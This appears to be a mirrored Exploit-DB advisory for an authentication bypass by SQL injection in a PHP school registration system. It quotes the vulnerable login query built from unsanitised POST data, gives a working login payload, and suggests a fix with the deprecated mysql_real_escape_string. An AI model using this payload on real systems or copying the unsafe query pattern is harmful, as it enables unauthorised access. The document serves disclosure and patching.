- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 40671
- Проверка EDB
-
- Пройдено
- Автор
- OPT1LC
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2016-11-01
School Registration and Fee System - Authentication Bypass
Код:
# Exploit Title.............. School Registration and Fee System Auth Bypass
# Google Dork................ N/A
# Date....................... 01/11/2016
# Exploit Author............. opt1lc
# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip
# Version.................... N/A
# Tested on.................. XAMPP
# CVE........................ N/A
# File....................... bilal_final/login.php
---------------------------------------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
/* student */
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
----snip----
---------------------------------------------------
Exploit
-------
You can login with username and password : administrator' or '1'='1
Patching
-------
You can use one of function in PHP : mysql_real_escape_string() to
---------------------------------------------------
----snip----
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
/* student */
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
----snip----
---------------------------------------------------
Credit
-------
This vulnerability was discovered and researched by opt1lc
Shout
-------
My Beautiful Daughter & My Wife
Reference
-------
http://php.net/manual/en/function.mysql-real-escape-string.php- Источник
- www.exploit-db.com
